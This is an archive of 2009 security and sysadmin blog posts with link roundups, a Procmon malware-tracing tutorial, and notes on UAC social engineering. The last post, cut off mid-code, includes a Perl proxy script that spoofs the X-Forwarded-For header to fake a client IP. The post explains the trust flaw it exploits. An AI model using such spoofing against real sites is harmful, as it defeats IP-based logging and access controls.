
Thursday, April 30, 2009

Toying around with andLinux

0 comments

I don’t remember exactly where I heard about andLinux (although I seem to remember that it was on the Ubuntu UK Podcast). It is a package based on coLinux (Cooperative Linux), which in turn is a port of the Linux kernel to the Windows platform. How does that work? The short (and somewhat inaccurate) description is: the Linux kernel runs as a separate process under Windows, with a special set of drivers that tunnel I/O to a set of simulated devices (for example, hard disk reads and writes are tunneled to a file, network packets are sent to a virtual NIC, etc). What andLinux brings to the table is a set of preconfigured interoperability services (like installing Xming and setting up shortcuts to connect to the VM).

screenshot_krita

Some things I found during the short time I’ve run andLinux:

  • Latency is quite bad, especially for GUI applications tunneled through Xming. This is understandable in a way, since coLinux is just one Windows process with another layer of “scheduling” inside of it (that is, it can’t take advantage of multi-core systems).
  • The supplied Ubuntu version is rather old (7.10), but you can’t really upgrade because the kernel might break on you (see the above explanation of coLinux for why you need a special kernel). However, you can still update the packages by editing /etc/apt/sources.list and using the name old-releases.ubuntu.com (see this thread on their forum). After the changes you can apt-get update / apt-get upgrade to your heart’s content.
  • Surprisingly, aptitude is not installed, but this can be resolved quickly with apt-get install aptitude
  • To expand the size of the root drive, do the following (I’m assuming that you have Cygwin installed):
    1. Stop coLinux
    2. Execute the following command on the main drive image: dd if=/dev/null of=base.drv bs=1G seek=8 This will extend it to 8 GB. Be aware that you have to use a filesystem which supports files larger than 2 GB (i.e. NTFS) (credit to the OpenWRT wiki for inspiring the command)
    3. Restart coLinux and issue the following command (found it here): resize2fs /dev/cobd0
    4. Done! (BTW, isn't it amazing that you can resize the FS online, without unmounting it first?)
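
The dd command in step 2 grows the image by moving the end of the file rather than by writing data. Here is a minimal Python sketch of the same idea, assuming the image is an ordinary file. The function name grow_image and the demo file are made up for illustration, and unlike the dd one-liner it refuses to make the file smaller:

```python
import os
import tempfile


def grow_image(path, new_size):
    """Extend the file at `path` to `new_size` bytes without writing data.

    Refuses to shrink the file, because cutting off the tail of a
    filesystem image would destroy data. Returns the number of bytes added.
    """
    current = os.path.getsize(path)
    if new_size < current:
        raise ValueError(
            "refusing to shrink %s from %d to %d bytes" % (path, current, new_size)
        )
    os.truncate(path, new_size)
    return new_size - current


if __name__ == "__main__":
    # Demo on a throwaway file. Only touch a real image while coLinux is stopped.
    with tempfile.TemporaryDirectory() as tmp:
        demo = os.path.join(tmp, "demo.drv")
        with open(demo, "wb") as handle:
            handle.write(b"\0" * 4096)
        added = grow_image(demo, 1024 * 1024)
        print("added", added, "bytes")
```

The filesystem inside the image still has to be grown afterwards (step 3); this only makes room for it.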

PS. Other ways to run Ubuntu in parallel with Windows are: using Qemu or even using Qemu from a USB stick. And let’s not forget the ubercool wubi installer, which makes installing Ubuntu on a Windows machine as easy as any other (Windows) program.

Wednesday, April 29, 2009

Database links

0 comments

Via the MySQL performance blog: the Percona 2009 conference posted the slides (most of them anyways). There is some very good and diverse material in there (not necessarily MySQL specific). I also found the following link in one of the presentations: http://omniti.com/does/postgresql – love it!

Testing Disk Speed: the dd Test – I/O is the bottleneck in a well-designed DB, so it is important to know how far you can stretch it. Along the same lines of database testing we have Database Test 2, a series of tests. There are some interesting benchmarks related to different configuration options with different filesystems. Of course, you should do your own testing, but this is a good starting point.

Finally, there are some issues with iotop, but it still helped me track down the fact that when I upgraded to Ubuntu Jaunty (9.04), the indexer got reactivated and was stressing the hard drive of my machine.

Picture taken from LindaH's photostream with permission.

Tuesday, April 28, 2009

Using Procmon for finding malware

5 comments

The scenario is: you know you are infected, because you’ve identified a process associated with malware, but you can’t figure out how that process is getting launched. A variation of this is: you kill the process and remove the executable, but it reappears after a given amount of time / after reboot / etc.

A great tool to help you identify the source of the problem is Process Monitor (or Procmon for short) from Microsoft (formerly Sysinternals). It records all kinds of actions related to the registry, filesystem and network, with detailed information about the source of the call (process, stack trace, etc). It can also perform this logging during bootup (which is useful, since malware can launch before you get to the desktop). Here is a short tutorial on how to use it:

The scenario is:

You have malware.bat in your system32 directory with the following content:

@echo off
echo Boo!
pause > NUL

It is being launched by launcher.bat, which is started because of an entry in the registry and has the following contents:

@echo off
call c:\WINDOWS\system32\malware.bat

Pretend that you don’t know this and want to find out how the “malware” gets started. So fire up Procmon and check “Enable Boot Logging”. You can also uncheck “Resolve Network Addresses”, because we are not interested in them currently and it speeds up things a little bit.

procmon_options

Now restart your computer and observe that the “malware” is launched. Now start Procmon again, and it will ask you if (and where) you want to save the capture file from this reboot:

procmon_save_bootfile

After you’ve saved the file, you can search in it and locate references to our “malware”. When you’ve located a reference, you can see the properties of the process at the moment it executed the particular command. In our case it is cmd.exe running the “launcher”:

procmon_file_properties

However, this was the easy part. The hard part is interpreting the results :-). A process can “touch” a file for many reasons. Don’t immediately assume that just because a process is related to the malware, it too is malicious. For example, all programs registered in the “Run” and similar registry keys are started by explorer.exe, which isn’t malware ;-). Another reason why a clean process could launch malicious files is that it has loaded a DLL related to the malware; check the Stack tab to see where the call came from. Conversely, just because the name / icon looks familiar, don’t assume that it’s innocent. Check that it is in the right path (an old trick is to put executables in the system directory with the same names as the ones in system32). If possible, check that the digital signature is valid (malware can, for example, modify the code in executables to launch itself, which invalidates the signature). When in doubt, double-check. Sites like VirusTotal can give you a good indicator of the “maliciousness” of a file. Also, you can submit your files to sandboxes like ThreatExpert or CWSandbox and see how they behave. This can give you an indication of other files you might need to take a look at.
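
If the capture is large, the search can also be done outside of Procmon. The sketch below assumes that the capture was saved in CSV format and that the header uses the column names "Process Name", "PID", "Operation" and "Path"; check these against your own export. The sample rows (including the registry value name) are invented for the demo and are not real Procmon output:

```python
import csv
import io


def find_references(rows, needle):
    """Yield (process, pid, operation, path) for rows whose Path mentions `needle`."""
    needle = needle.lower()
    for row in rows:
        path = row.get("Path") or ""
        if needle in path.lower():
            yield row.get("Process Name"), row.get("PID"), row.get("Operation"), path


def load_rows(handle):
    """Wrap an open CSV export so each event becomes a dict keyed by column name."""
    return csv.DictReader(handle)


# Invented sample data in the assumed CSV layout.
SAMPLE = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01","explorer.exe","1200","RegQueryValue","HKLM\Software\Microsoft\Windows\CurrentVersion\Run\launcher","SUCCESS",""
"10:00:02","cmd.exe","1544","CreateFile","C:\WINDOWS\system32\malware.bat","SUCCESS",""
"10:00:03","svchost.exe","800","ReadFile","C:\WINDOWS\system32\config\system","SUCCESS",""
'''

if __name__ == "__main__":
    for hit in find_references(load_rows(io.StringIO(SAMPLE)), "malware.bat"):
        print(hit)
```

For a real export, open the file with encoding="utf-8-sig" and newline="" and pass the handle to load_rows. The result is only a list of processes that touched the file; the interpretation caveats above still apply.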

Good luck and stay secure!

Oracle buys Sun (and gets MySQL)

0 comments

Here is Monty’s (co-founder of MySQL, left Sun some time ago) opinion. On a more light-hearted note, here are some Slashdot comments :-)

From rho – a good example for why case sensitivity is important:

> Their string comparisons are case sensitive.

8.4 has citext. Or you can make an index with lower() on the appropriate columns.

IMO it's preferable for software to not assume that "Helped my uncle Jack off a horse." and "Helped my uncle jack off a horse." are the same thing.

And from Just Some Guy we get the security angle on it:

Imagine an OS where strcmp() was case insensitive, and where it was used to compare hashed passwords when authenticating users. Realize that base64 is now really base36, and that you're been throwing away approximately half the bits per character in the encoded password, and that your passwords are now about .5^$LENGTH as secure.

Have fun auditing your MySQL-based webapps to make sure that none of them use base64 password encoding coupled with case-insensitive searches!
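
To make the base64 point concrete, here is a small sketch (not taken from the comment; all function names are made up) that counts how many distinct symbols remain once case is ignored and builds two different byte strings whose encodings only differ in case:

```python
import base64
import math
import string

B64_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def effective_alphabet_size(case_sensitive):
    """Number of base64 symbols that can still be told apart."""
    symbols = B64_ALPHABET if case_sensitive else B64_ALPHABET.lower()
    return len(set(symbols))


def bits_per_char(case_sensitive):
    """Information carried by one encoded character, in bits."""
    return math.log2(effective_alphabet_size(case_sensitive))


def case_twin(data):
    """Return different bytes whose base64 text matches `data` when case is ignored."""
    encoded = base64.b64encode(data).decode("ascii")
    twin = base64.b64decode(encoded.swapcase())
    return twin if twin != data else None


if __name__ == "__main__":
    print(effective_alphabet_size(True), effective_alphabet_size(False))
    print(round(bits_per_char(True), 2), round(bits_per_char(False), 2))
    print(case_twin(b"\x00\x00\x00"))
```

With the standard alphabet this leaves 38 distinguishable symbols (26 letters, 10 digits, "+" and "/"), so each character carries roughly 5.25 bits instead of 6, and a case-insensitive comparison would accept the twin as equal to the original.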

The new Solaris licensing terms:

1s - free
0s - $10 per 0, minimum 100,000 0s

per processor core, multiplied by the number of megabytes of RAM installed in your system.

Oh, pardon me, this isn't a production system, but is a development workstation? Allow me to refer you to the above licensing fee schedule. Thank you for choosing Oracle!

The new stock ticker:

Oracle (ORCL) announces that in order to emphasize the importance of this operation, and better reflect its activities, will switch its stock ticker name to JAVA.

:-)

My personal opinion is that this will accelerate people migrating to MySQL forks like Drizzle. That is good, because such forks remove much of the old cruft, but migration is painful if you happen to rely (knowingly or unknowingly) on one of those “features”. But it has to be done (like migrating to Apache 2, PHP 5, etc).

Mixed links

1 comments

We start off with a rebuttal from VMware to a video posted by Microsoft comparing Hyper-V and VMware ESX. While I’m no fan of any big company, such misleading marketing attempts should be considered unethical and maybe even illegal, since the video mischaracterizes some features, like the page sharing between VMs. While in this video we clearly have a “marketing” guy and a “tech” guy, sometimes the “tech” guys themselves engage in such behavior: on show 52 of RunAs Radio (a great, albeit somewhat Microsoft-focused, IT podcast BTW) Anil Desai, who is described as “an independent consultant based in Austin, TX”, says something like: “VMware ESX has a large disk footprint, a couple of hundred megabytes, while Hyper-V is small, it only needs a couple of megs”, neglecting to mention that in order to run Hyper-V you have to have Windows Server 2008 installed, which consumes a couple of gigabytes.

The Braidy Tester’s blog has a very nice series entitled “Favorite Bug”. One of the recent ones was caused by a failure to strip the references to debugging symbols, combined with the path of the debugging symbols pointing to the CD drive (on some machines). Ouch! Very obscure, very hard to reproduce and very hard to diagnose. Congratulations on catching it!

From terminal23.net: throw-away mail box sites – useful if you don’t want to receive spam like I do :-). You can get a temporary address also from PlanAHeist (via their blog).

Detecting VMware with JavaScript – the short version: it uses JavaScript to find the MAC addresses of the NICs and compares the manufacturer prefix (the first three bytes) with the ranges reserved for VMware. Of course, if you have this level of privileges from JS, you can do other things (like enumerating processes and looking for the VMware guest additions, etc). Cool idea.
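
The comparison itself is simple. Below is a Python sketch of the prefix check only (not the JavaScript from the linked article). The OUI list is an assumption based on the prefixes commonly attributed to VMware and should be verified against the IEEE registry; MAC addresses can also be changed, so a match or a miss proves little:

```python
import string

# Prefixes commonly attributed to VMware; treat this list as an assumption.
VMWARE_OUIS = {"00:05:69", "00:0C:29", "00:1C:14", "00:50:56"}


def normalize_mac(mac):
    """Turn '00-0c-29-ab-cd-ef' or '000c29abcdef' into '00:0C:29:AB:CD:EF'."""
    digits = "".join(ch for ch in mac if ch in string.hexdigits).upper()
    if len(digits) != 12:
        raise ValueError("not a MAC address: %r" % (mac,))
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def looks_like_vmware(mac):
    """True if the manufacturer prefix (first three bytes) is in VMWARE_OUIS."""
    return normalize_mac(mac)[:8] in VMWARE_OUIS


if __name__ == "__main__":
    for candidate in ("00-0c-29-ab-cd-ef", "00:1A:2B:3C:4D:5E"):
        print(candidate, looks_like_vmware(candidate))
```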

Via the Reverse Engineering Reddit:

  • IDC scripting a Win32.Virut variant - Part 1 – a good intro into IDA scripting.
  • Bit Twiddling Hacks and The Aggregate Magic Algorithms – while they are cute and interesting to look at, never-ever use them in production code! The only exception is if you’ve profiled your code, thought about it for a week and still think that it is a good idea to do it, because understanding, debugging and porting such code can be a nightmare (also remember that “Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it.” - Brian W. Kernighan)
  • So You Want To Be a Hacker? - Part I, Part II, Part III and Part IV. It covers it from the point of view of somebody wanting to modify (“mod”) a closed-source game. Very useful to get into the mindset.
  • Locked and Loaded – an error in the Windows XP SP2 exception handler (it would be interesting to see exactly which versions of MS Windows exhibit this behavior)

From the fun department: Black Perl - “Black Perl is an infamous piece of Perl poetry”. Staying with the fun side of Perl, we have SuperPython (via perl one-liner). If you don’t get the joke (as I didn’t at first): it takes the number of spaces at every line, treats it like the ASCII code of a character and evaluates the resulting string. Here is how to convert a simple program to SuperPython :-).
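
The encoding described above fits in a few lines. This is a Python sketch of the idea only, not the original Perl code; encode and decode are made-up names:

```python
def encode(source):
    """One output line per character; each line consists of ord(char) spaces."""
    return "\n".join(" " * ord(ch) for ch in source)


def decode(whitespace):
    """Count the spaces on every line and turn each count back into a character."""
    if whitespace == "":
        return ""
    return "".join(chr(line.count(" ")) for line in whitespace.split("\n"))


if __name__ == "__main__":
    hidden = encode("print('Hello from the whitespace')")
    # The "program" is now nothing but spaces and newlines.
    print(len(hidden.split("\n")), "lines of spaces")
    # Only evaluate input you trust: exec runs whatever the spaces spell out.
    exec(decode(hidden))
```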

From Scott Hanselman: Low Bandwidth View and other Hidden (and Future) Features of MSDN

From taint.org:

  • Message Queue Evaluation Notes – from Second Life. Can be useful if you are looking at different options to implement MQs (it mainly looks at FLOSS options, which is good, both from a price and from a “debuggability” point of view). There is also a related comment on the Unlimited Novelty blog.
  • Two sites for visualizing sorting algorithms: one more visual (with many cool options for filtering) and one static (but it might be better than the first option for visually / instinctively comparing two algorithms)
  • Facebook's photo storage rewrite – very cool. Also, it is quite interesting that they found it necessary to optimize it to this level (i.e. dropping filesystem structures entirely). Probably it is just the law of large numbers – the improvement might be relatively small but in absolute terms large.
  • Akamai IP Application Accelerator – sounds like a cool service (routing traffic through a private network with guaranteed characteristics), however – as the post shows – it’s not all roses and you should do a careful evaluation before using it.
  • Easy AI with Python – at first I thought that it would be about Orange or something similar, but the talk is at a much more basic level. A lot of fun. Embedded below for simplicity :-)

Via rootshell.be I found this page: Detecting loss of performance in Dynamic Bottleneck Capacity (DBCap) measurements using the Holt-Winters Algorithm. While it is a mouthful, it is basically a method to detect regularities in the data and predict future values based on these regularities (or more precisely: to detect when the actual values don’t match the predicted values). It seems that rrdtool/cacti has some support for this, so you might not need to understand all the math behind it to use it :-) (the picture below is taken from the linked forum post).
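
To give a feel for the method, here is a rough Python sketch of additive Holt-Winters smoothing with one-step-ahead forecasts. It is a simplification and not the algorithm from the linked page or from rrdtool: the initialization is naive, the smoothing constants are arbitrary, and deviations are compared against a fixed tolerance chosen by the caller. All names are made up:

```python
def one_step_forecasts(series, period, alpha=0.5, beta=0.1, gamma=0.1):
    """Return {index: forecast} for every point after the first season."""
    if len(series) < 2 * period:
        raise ValueError("need at least two full seasons of data")
    first, second = series[:period], series[period:2 * period]
    level = sum(first) / period
    trend = (sum(second) - sum(first)) / (period * period)
    seasonal = [value - level for value in first]

    forecasts = {}
    for t in range(period, len(series)):
        season = seasonal[t % period]
        # Predict before looking at the actual value.
        forecasts[t] = level + trend + season
        value = series[t]
        previous_level = level
        level = alpha * (value - season) + (1 - alpha) * (level + trend)
        trend = beta * (level - previous_level) + (1 - beta) * trend
        seasonal[t % period] = gamma * (value - level) + (1 - gamma) * season
    return forecasts


def find_anomalies(series, period, tolerance, **smoothing):
    """Indices where the actual value is further than `tolerance` from the forecast."""
    forecasts = one_step_forecasts(series, period, **smoothing)
    return [t for t in sorted(forecasts) if abs(series[t] - forecasts[t]) > tolerance]


if __name__ == "__main__":
    traffic = [10, 20, 30, 20] * 5
    traffic[10] = 90  # inject a spike into otherwise regular data
    print(find_anomalies(traffic, period=4, tolerance=5.0))
```

Note that the points right after a spike can be flagged as well, because the model needs a few steps to settle down again.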

cacti_graph 

From the SANS diary: it seems that OAuth has some serious (protocol level!) issues. This is bad, because it means that everyone (including the big boys like Google and Yahoo) who conforms to the specification has this issue. Update: in the meantime they’ve released details about the problem. It is a kind of session fixation attack, but against the OAuth session, not the actual website session.

From the All about Linux blog: OpenOffice.org Opens up for Business – an article talking about setting up OpenOffice.org in companies. It has some good suggestions. An additional thing you could do is to set the default file format to Microsoft Word.

An interesting behavior of PHP: The Problem With is_callable() And __call()

How to grep for multiple strings: grep "string1\|string2\|string3" file (found it here).

From daniel.haxx.se: bittorrent vs HTTP and FTP vs HTTP – short comparisons between the different protocols. Not very detailed, but a good overview if you don’t know the details of the protocols.

Via the digitalbond blog: How to perform a full 65,535 UDP and TCP port scan with just 784 Packets – ok, the description is a little misleading, the actual mechanism is: it connects to the remote (Windows) machine through WMI (so it must have a valid login credential) and asks for the list of open ports. Even if we set these restrictions aside, it’s still less accurate than a full scan, because local rootkits can subvert the system to hide open ports, which makes me question the accuracy of the phrase “If you have a PCI requirement to perform a full port scan of a target, this credentialed technique can also be used” (then again, rootkits are mostly used to hide outgoing, not incoming, traffic).

On the Dark Operator blog there is a nice overview of FOCA, a tool to extract metadata from a large number of different file formats. This can be very useful for penetration testers, for example.

Via the 1raindrop blog: 10 easy steps to writing the scariest cyberwarfare article ever. Very true. I also liked the first comment:

Any insider in any walk of life could write a similar article about how the mainstream media misleads people about their specialty. The lesson is simple. The mainstream media only knows how to write a few types of stories. They will make any subject fit into one of their templates.

The funny part is that, knowing that the media doesn't get their area of expertise right, people still believe what the media writes in areas outside of their specialty. OK, it's not that funny. Still, I have to admire the media for their ability to write the same few stories over and over and keep people reading them.

Via the Secure Home Networks blog: an additional source for domain names to block (from emerging threats). These kinds of blacklists (although they can’t cover 100% of the problems) are very effective these days, when almost all malware tries to communicate with a specific set of IPs / domain names.

From the Mu Dynamics Research Labs: Google Code respects the MIME type when serving up files directly from the SVN repo. A little-known SVN feature comes in handy here (maybe I can use this repo to host the small number of files which will be removed from the Google Pages site). Speaking of Google Code, they added support for Mercurial, and provide a nice visualization to understand the relation between the patches.

Matt Cutts managed to boot Ubuntu 9.04 in 7.83 seconds with an SSD. I myself updated to the final release yesterday and it went smoothly. The new theme is simpler and darker than the old one, which should make some people happy. And also note the number of packages it needed to download for the update:

Screenshot-Distribution Upgrade

Leet! :-). Some related notes: you can do a sudo apt-get autoremove followed by sudo apt-get autoclean to free up some space after the update. Also, VirtualBox doesn’t seem to detect that there is a new version (2.2.0) out there; you have to manually go to the site, download the new package, remove the old one and install the new one. 9.04 doesn’t include the old, closed-source fglrx driver, but it actually seems to work better with the open source ones. It also includes a “cleanup” tool, but be wary: it marks manually installed packages (like VirtualBox or Opera) as “not needed”.

From Andy Helsby's  Bookmarks:

From LinuxWorld we have: 10 Expert Ubuntu Tricks – there are some nice ones in there which you might or might not have known about. For example 3, 4 and 5 were new to me.

Via the Farfromr00tin blog we have a paper about the ramifications of IE7/IE8 zones [PDF]. The gist of it: if one of your intranet sites gets powned, it is really, really bad. On a related note: Google Chrome just fixed a vulnerability related to the existence of an “undefined” zone, which made the same-origin policy exploitable.

Data escaping madness from Joshua Drake’s blog. These are small details which can bite you in the rear end, so test, test, test religiously. And also test for failure, to make sure that the proper exception is thrown if something goes south.

Via Roger's Security Blog: Cost of a Lost Laptop – useful if you need to convince people that laptops need additional security.

Free networking tools:

From the carnal0wnage blog: How do YOU defend against 0day?! – the short answer: by diversifying (not using what the mainstream uses). The long answer: a large number (90%+ – I’m pulling this out of my rear-end) of computers are not even patched relative to the known vulnerabilities, so it is very rare that you have to worry about 0days.

From Arbor Networks: Many Days of DDoS for Everyone – as it stands now, there are a whole lot of people out there who can take down a whole lot of websites via DDoS, producing real financial harm for those individuals / companies (although we could debate on a philosophical level if money is real :-)). What are we going to do about it? (sidenote: every time I hear about twitter, I wonder if the people who invested all that money into it understand that a 16-year-old can take it offline for weeks).

Trooper.ro – a great Romanian metal band, and they’ve put many of their songs online for free. You can start here, with one of their first and maybe best known pieces.

Upcoming PHP 5.3 features and beyond – also includes a presentation of some of the PHP 6 features, mainly focused on internationalization and localization (two hard problems).

Monday, April 27, 2009

Social engineering for malware – a bright future

0 comments

Some time ago I wrote a post in which I pondered the deficiencies of the “executable file” definition and the implications for whitelisting products. The problem is that “data” files can also result in actions being taken (and we don’t even need arbitrary-code-execution type vulnerabilities for that). The particular example given in the post is that of installer (MSI) files, however here is another one: VBScripts.

cscript.exe is included in all recent versions of Windows by default, so using a simple VBScript which I found via this article we can produce the following elevation prompt:

elevate_vbs

Observe how any detail which could help us identify the actual script is utterly missing, and also how everything seems to indicate the trustworthiness of the application (after all, it is a “verified” Microsoft program). You can do the same thing with JScript or PowerShell, which is included by default in Windows 7 (yes, I’m running it in a VM, and yes, it is annoying as hell!). Something like Symantec’s UAC extension might help you, since it has the ability to show the command line, but the fraction of people who will take a look at it and be able to make a judgment call is very, very small.

In conclusion: UAC made most of the existing malware obsolete, but it is just a question of (little) time until we see malware adapted to Windows Vista / Windows 7. UAC will improve the code quality somewhat (unfortunately most programmers will think of it the “how to avoid triggering UAC and work around its quirks” way, rather than “how to ensure that our application only uses a minimal set of privileges”), but in the long run it won’t solve the malware problem (or even make a considerable dent in it), just like other technologies won’t. To Microsoft’s credit, they said this, but I’m not sure that all people got the message (and there is also the fact that in many places, Microsoft or not, UAC is listed as something which will make you “more secure”). The remaining role of UAC will be that IT people can say to their users: “it is your fault! you have been asked if you want to run the program!”.

PS. And getting by the kernel-mode restrictions is as easy as installing a new root certificate, which is trivial if you have administrative privileges... This means that it will be business as usual, for rootkit writers also.

Update: After poking around with the Symantec UAC tool, it seems that it too is susceptible to a similar attack, and it is maybe worse (because it displays more "green checkboxes" indicating that the command you are about to run is safe).

Sunday, April 26, 2009

Interesting method for website blocking

0 comments

Quick note: I was listening to the latest episode of Watchguard’s Radio Free Security podcast (no relation to them, other than being a listener of the podcast) and they discussed an interesting technique for filtering websites (I’m no fan of traffic filtering, but the technique seemed interesting):

Usually SSL requests are blocked either by the target IP or by the target hostname, because the filtering proxy doesn’t have the ability to look into the actual content. Another frequently used approach is for the proxy to decrypt and then re-encrypt the traffic, however this requires a certificate to be installed on every user’s computer, otherwise they will get an “Invalid certificate” error on every SSL website they visit. What the Watchguard appliance can do is look at the certificate of the website (which is transmitted in the clear at the beginning of the session negotiation) and block based on the name present in the certificate. Nifty!
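
The decision itself boils down to matching the names in the certificate against a blocklist. Here is a Python sketch of that step. It is only an illustration: an appliance reads the certificate passively from the handshake, while fetch_certificate below makes its own connection, and the function names and blocklist patterns are made up. The dictionary layout is the one returned by ssl's getpeercert():

```python
import fnmatch
import socket
import ssl


def certificate_names(cert):
    """Collect the commonName and DNS subjectAltName entries of a getpeercert() dict."""
    names = set()
    for rdn in cert.get("subject", ()):
        for key, value in rdn:
            if key == "commonName":
                names.add(value.lower())
    for kind, value in cert.get("subjectAltName", ()):
        if kind == "DNS":
            names.add(value.lower())
    return names


def is_blocked(cert, blocked_patterns):
    """True if any name in the certificate matches a pattern like '*.example.com'."""
    return any(
        fnmatch.fnmatchcase(name, pattern.lower())
        for name in certificate_names(cert)
        for pattern in blocked_patterns
    )


def fetch_certificate(host, port=443, timeout=5.0):
    """Connect to host:port and return the server certificate as a dict."""
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()


if __name__ == "__main__":
    # Hand-written certificate data, so the demo runs without network access.
    sample = {
        "subject": ((("commonName", "www.example.com"),),),
        "subjectAltName": (("DNS", "www.example.com"), ("DNS", "example.com")),
    }
    print(is_blocked(sample, ["*.example.com"]))
    print(is_blocked(sample, ["*.example.org"]))
```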

Picture taken from kpwerker's photostream with permission.

Friday, April 17, 2009

Interesting videos

1 comments

It seems that the Internet is helping more and more to find the equilibrium point between the needs of “big media” and “independent media”. In this post I would like to mention two sources of useful / interesting videos:

The first would be the videos from the TED (Technology, Entertainment, Design) conference (credit goes to Kees Leune for bringing it to my attention). From Wikipedia:

TED (Technology, Entertainment, Design) is an annual conference that defines its mission as "ideas worth spreading". The lectures, also called TED Talks, cover a broad set of topics including science, arts and design, politics, education, culture, business, global issues, technology and development, and entertainment. Speakers have included such people as former U.S. President Bill Clinton, Nobel laureates James D. Watson, Murray Gell-Mann, and Al Gore, Microsoft co-founder Bill Gates, Google co-founders Sergey Brin and Larry Page, and Billy Graham.

The videos of the talks can be found on their website (which, somewhat surprisingly, uses PHP :-)). The good: the talks are short (between 5 and 30 minutes) and the speakers are very enthusiastic. Also, the videos are clearly licensed under a well-known license (the CC by-nc-nd 3.0 license) and you can embed them on your websites (for example below I’ve embedded a very interesting talk about the psychology of cheating). The player is also quite advanced (for example it can do seeking without waiting for the entire movie to load). The bad: they don’t have a playlist feature, so it is a little harder for you to mark the videos which you would like to watch. You can however open them in a background tab, because the player doesn’t load until you actually look at the page. Another word of warning: the volume control resets itself between views. Also, some of the talks are a little “out there”, but – as always – use your judgment.

Another source of science / tech news is the Google Tech Talks. Again, there is a lot of material (some of it in HD quality) and you can find a lot of interesting content:

The conclusion: there are a lot of good videos out there which you can watch entirely legally and which should make “big media” realize how inflated their pricing scheme is.

Thursday, April 16, 2009

Weird Sybase JDBC driver issue (jConnect)

0 comments

I post this so that the search engines can pick up on it and maybe it can help somebody out. I had the following issue with the Sybase JDBC driver (jConnect):

I was calling a stored procedure and it was throwing an error. However these errors weren’t propagated to the Java code in form of SQLExceptions, as I was expecting. Things which solved the problem:

None of the solutions are ideal and some are actually counter-intuitive (why should it make a difference if I use .executeUpdate instead of .execute? – the latter should be a more generic version of the former). I’m by no means a JDBC expert, so I posted it on stackoverflow.

PS. This is another reason for using open-source: with it you can at least step through the code without using tools like JadEclipse (which is a very nice tool btw for decompiling your classes directly from your IDE without any fuss).

Be an (imaginary) hero

0 comments

I got the link from splitbrain.org, however I was hesitant to post the image, since the site didn’t display any information about the conditions of using it:

MyHero

Make your own at www.cpbherofactory.com

However I finally got a response from the cpbgroup (the creators of the Hero Factory), in which they state that I can use the image on my personal website as long as I include a link back to them. Not the response I was hoping for, but at least they got back to me. It is very important to license your work and think ahead of time about how you would and wouldn’t like your work to be used (another shortcoming of the reply was that it applies specifically to me and my blog. While I assume that they would license it to everyone under the same conditions, it would have been nice if they had stated this in their response).

Monday, April 13, 2009

User input, by any other name

0 comments

A friend of mine posed an interesting question: how is it possible that a CMS, which displays the IP address (instead of the username) for comments made anonymously, showed a private IP (like 172.16.63.15)? Before I get to the actual explanation, here are some clarifications which should be made:

  • IP addresses are not a 100% reliable unique identifier. Well known methods of circumventing such restrictions are dynamic IP addresses and proxy servers. A less well-known method is BGP hijacking for example. These couldn’t have been the method used however, because almost any router (hopefully) would have dropped the packets containing private addresses.
  • Make sure that the IP addresses are actually private. The actual private IP ranges are the following (as defined by section 3 of RFC 1918):
    • 10.0.0.0 - 10.255.255.255
    • 172.16.0.0 - 172.31.255.255
    • 192.168.0.0 - 192.168.255.255
    It is easy for someone not working daily with these ranges to mistake an IP close to these ranges for a private one, like 196.168.1.2. Another source of confusion is the less intuitive range for class B (for example, the address 172.15.80.1 is public and routable).
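
Rather than eyeballing the ranges, the check can be left to code. Here is a minimal Python sketch using the standard ipaddress module; the function name is_rfc1918 is made up, and it tests only the three ranges listed above:

```python
import ipaddress

# The three private ranges from section 3 of RFC 1918, in CIDR notation.
RFC1918_NETWORKS = [
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
]


def is_rfc1918(address):
    """True if `address` falls inside one of the three RFC 1918 ranges."""
    ip = ipaddress.ip_address(address)
    return any(ip in network for network in RFC1918_NETWORKS)


if __name__ == "__main__":
    for candidate in ("172.16.63.15", "172.15.80.1", "196.168.1.2", "192.168.1.2"):
        print(candidate, is_rfc1918(candidate))
```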

Now for the actual cause: my first (and, as it turns out, correct) intuition was that the software was trying to be too clever for its own good and was parsing the “X-Forwarded-For” header. This header can be added by proxies to indicate the original source of the request, but – like any other user input – it can be spoofed relatively easily by the client. For example, below is a small Perl script which uses HTTP::Proxy and adds an arbitrary X-Forwarded-For header to your requests (you can find the most up-to-date version of the script in my SVN repository):


#!/usr/bin/perl
use strict;
use warnings;
use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;
use Data::Dumper;

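# Start a local proxy on port 3128 and stop it from adding its own
# X-Forwarded-For header, so that only the spoofed value is sent.
my $proxy = HTTP::Proxy->new;
$proxy->x_forwarded_for(0);
$proxy->port(3128);
$proxy->push_filter(
    mime    => undef,    # do not restrict the filter by MIME type
    request => HTTP::Proxy::HeaderFilter::simple->new(
        # $_[1] is the HTTP::Headers object of the outgoing request
        sub { $_[1]->header('X-Forwarded-For' => '10.1.2.3') },
    ),
);
$proxy->start;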

There are a couple of issues here:

  • PHP mixes values of different “trust levels” in the same structure. In fact, the actual code from the project looked like this: if (!array_key_exists('ip', $this->arrCache)) { $this->arrCache['ip'] = strlen($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; }. As you can see, both REMOTE_ADDR and HTTP_X_FORWARDED_FOR were obtained from the same array, even though REMOTE_ADDR is much more trustworthy (not counting issues like route hijacking)
  • The next logical question would be: what sanitization is done on this value? I didn’t dig more deeply into the code, but judging from the code fragment, not very much. In fact, if I recall correctly, this header can contain multiple IP addresses if the request passed through multiple proxies, a case which doesn’t seem to be handled by this code. It can contain IPv6 addresses. It can also contain characters which can cause problems if the value is used in a certain way (think SQL injection or command injection)
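
Here is a sketch of a more defensive way to handle the header, written in Python rather than PHP to keep it short. It is not the CMS’s code; the function names and the max_entries limit are made up. The idea: the address of the peer always identifies the commenter, and the header is kept only as a list of validated, client-supplied hints:

```python
import ipaddress


def parse_forwarded_for(header_value, max_entries=10):
    """Return the syntactically valid IP addresses from an X-Forwarded-For value.

    Anything that does not parse as IPv4 or IPv6 is dropped, so quotes,
    semicolons and other injection material never reach the caller.
    """
    addresses = []
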